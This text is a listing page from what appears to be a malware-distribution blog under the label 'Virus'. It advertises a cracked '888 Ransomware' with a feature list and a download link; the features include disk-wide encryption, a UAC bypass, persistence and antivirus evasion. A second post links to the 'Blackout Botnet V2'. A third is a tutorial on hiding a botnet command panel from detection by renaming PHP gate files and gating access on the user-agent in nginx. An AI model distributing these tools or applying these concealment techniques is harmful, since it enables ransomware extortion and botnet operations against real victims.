Posts

Showing posts with the label Virus

888 Ransomware Cracked

Image
Feature: -------- – AES encryption – WallPeper Percistence – upx – icone changer – StartUp bypass Proactive -Encypt all Hard Disk + appdata + desktop + images & doc & music Directory -Kill Skype & All browser (Firefox + opera +Chrome + IE + Tor) -Real Exploit Uac Disable to Full Dir Control & Encrypt -Anti kill proccess + Start Up persistence (Can’t Delete Virus) -Obfuscator anti Av (Fud Virus) —– Work with (All Windows ) 32 bits and 64 bits —– DOWNLOAD LINK THIS IS CLEAN FILE - BUT USE IN VM OR RDP 

Blackout Botnet V2

Image
DOWNLOAD LINK :-  http://www.datafilehost.com/d/be1b78f2

Secure Your Botnet Panel Using Nginx Config

Hi All The example will be on CentOS.   Our security will be based on two simple things in nginx configuration: user-agent. php extension.   The idea is simple, it is :   To change the file extension of the gate ".php" into something else. in our tutorial, ".gte" will be taken as example.   Configure nginx to process the files ".gte" as ".php".   Lock all access (Get) to php files (and other extensions if we want) of our panel on a long user-agent (if user-agent is false return 404).   Nginx installation :  http://howtounix.info/howto/nginx-php-5-3-10-and-php-fpm-on-centos-5-7-6-2   Configure Nginx :   nginx.conf (/etc/nginx/nginx.conf) : user nginx ; worker_processes 1 ; error_log / var / log / nginx / error . log warn ; pid / var / run / nginx . pid ; events { worker_connections 1024 ; } http { include / etc / nginx / mime . types ; default_type ap...